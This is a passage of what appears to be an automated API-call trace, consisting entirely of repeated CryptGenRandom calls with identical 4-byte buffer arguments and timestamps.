CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.806] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.807] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.808] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.808] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.808] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.808] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.808] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.808] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.808] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.808] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.808] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.809] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.810] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.811] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.812] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 